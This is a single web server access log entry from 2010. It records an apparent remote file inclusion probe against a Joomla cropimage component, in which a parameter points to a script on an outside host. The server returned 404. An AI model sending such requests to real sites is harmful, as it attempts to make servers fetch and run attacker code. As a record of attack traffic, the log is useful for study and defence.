199.71.213.177 - - [17/Jan/2010:03:20:41 -0500] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
